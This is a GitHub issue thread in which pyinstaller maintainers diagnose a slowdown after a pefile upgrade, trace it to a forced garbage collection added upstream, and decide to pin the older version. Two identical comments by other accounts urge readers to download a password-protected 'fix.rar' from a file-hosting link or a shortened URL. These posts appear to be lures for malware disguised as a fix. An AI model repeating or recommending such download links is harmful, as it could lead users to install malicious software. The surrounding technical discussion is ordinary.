### ISSUE TITLE
FYI: Performance drop after pefile upgrade to 2024.8.26

### ISSUE THREAD

**Issue by mschwoer** [pyinstaller/pyinstaller#8762]
Hi,
just to let you know: since the upgrade from 2023.2.7 to 2024.8.26 the calls to `pefile.PE()` take considerably longer on a Windows github action runner.
This is observed in pyinstaller's "Performing binary vs. data reclassification" step, which seems to be frozen now (but actually does something).

cf. https://github.com/erocarrera/pefile/issues/420

best,
Magnus

**Comment by Aadya1603** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by rokm** [comment]
Thanks for the heads up! 

I think we can also see this happening on the today's CI run: https://github.com/pyinstaller/pyinstaller/actions/runs/10579038410/job/29310519204

According to a quick test, it is opening of non-PE files that takes considerably longer now - which is why binary-vs-data classification is affected. 

We can probably alleviate this by checking if given file has `MZ` signature before running a more thorough `pefile`-based test. (Similar to how on linux, we also first check for presence of ELF header and only then try to run `objdump` for validation).

**Comment by JMMarchant** [comment]
Can confirm we're also seeing this between two PRs (with `pefile` being updated to this version in between)

**Comment by GoldenCaterpie** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."

**Comment by rokm** [comment]
Hmmm, while quick MZ signature check does seem to improve the binary-vs-data reclassification stage, the performance impact is still very much noticeable during binary dependency analysis. Especially on our CI, where the effect is cumulative across all tests.

So while individual (larger) tests are not timing out anymore, the whole run still takes ~4 hours instead of the usual ~1 hour: https://github.com/rokm/pyinstaller/actions/runs/10583102103

As I mentioned before, in binary-vs-data reclassification, it is the data files being opened with `pefile.PE` that take performance hit. That's because https://github.com/erocarrera/pefile/commit/91fb851cb384fb45986cd1e80d2c63a7c22415b8 added a forced garbage collection into PE object's cleanup codepath. This is triggered by either explicit `PE.close()`, using `PE` with context, or if `PE()` fails to load the file and raises and exception. So for data files, we hit this last case. In `_classify_binary_vs_data`, we do not call `PE.close()` nor use `PE` with context (so I suppose that for files that we do open successfully, whatever resources we are supposed to be freeing with .close() end up leaked for the duration of the build process).

In contrast, in binary dependency analysis and its underlying `_get_imports_pefile`, we do call `PE.close`, hence the performance hit.

So I think we'll be pinning `pefile < 2024.8.26` for `develop` (and the upcoming release) and see how this plays out.

It might make sense to keep the MZ signature pre-check for reclassification around nevertheless, though, as a quick filter for (majority of) data files.

**Comment by bwoodsend** [comment]
Any idea what harm there would be in using the `fp.read(2) == b"MX"` approach exclusively?

**Comment by rokm** [comment]
> Any idea what harm there would be in using the `fp.read(2) == b"MX"` approach exclusively?

We'd be misclassifying any data file that happens to start with b"MZ" as a binary; and this will result in error later on when we try to perform binary dependency analysis on it.

**Comment by alexchandel** [comment]
Please revert the exclusion of pefile 2024.8.26, as it breaks builds that depend on it.  Instead, try calling `PE()` with `fast_load=True` or similar, if the performance is poor.

**Comment by rokm** [comment]
> Instead, try calling `PE()` with `fast_load=True` or similar, if the performance is poor.

The issue is not caused by the lack of `fast_load`, but by forced garbage collection that was introduced in 2024.8.26.

**Comment by alexchandel** [comment]
pefile 2024.8.26 fixed memory leaks with that, see [pefile#386](https://github.com/erocarrera/pefile/pull/386).  Some of us would like those memory leaks fixed.  Please remove the exclusion.  Users who like their memory leaks can exclude that version themselves.

**Comment by rokm** [comment]
> pefile 2024.8.26 fixed memory leaks with that, see [pefile#386](https://github.com/erocarrera/pefile/pull/386).

No, it didn't. It just masked the underlying issue by forcing the garbage collection to happen earlier than it would have otherwise. Which, as described by OP here and in https://github.com/erocarrera/pefile/issues/420, causes noticeable performance drop when `pefile` is used to process a large number of binaries in a loop (as is usually the case with PyInstaller builds).

The author of erocarrera/pefile#386 themselves wrote there: 
> couldn't find where the leak is, so `gc.collect()` from the gc module is used at the end of the `_close_data()` function to clear all unreachable and uncollected memory and release the file access lock.

So this is not really about a memory leak (the memory would be eventually freed, once the garbage collector kicks in on its own), but about fixing a file lock when trying to access the same file twice in a row (without enough time passing in between for garbage collection to happen on its own). And that could be worked around by calling `gc.collect()` between the two file accesses by the user of `pefile`, rather than forcing it in `pefile` itself.

---

> Some of us would like those memory leaks fixed. Please remove the exclusion. Users who like their memory leaks can exclude that version themselves.

If you aren't affected by slowdown during PyInstaller build that's caused by https://github.com/erocarrera/pefile/pull/386 / 2024.8.26 (or don't care about it), you should still be able to do a `pip install -U pefile` after PyInstaller is installed; `pip` might display error about dependency conflict, but it should still install newer version (at least it does so on my test system). 

But the exclusion is there to stay, because removing it will result in a torrent of performance-related bug reports for us. 

If this does not get fixed by upstream, I suppose we would have to switch to a vendored version without erocarrera/pefile#386 for our use, so you can use whichever version you want...

**Comment by bwoodsend** [comment]
Garbage collect can never collect truly _leaked_ objects so if there really had been a leak then `gc.collect()` wouldn't have fixed it. And if there really had been a leak then PyInstaller would have been the first to hear about it since one run of our test suite gets through about 50,000 `pefile.PE()` instances in one process.
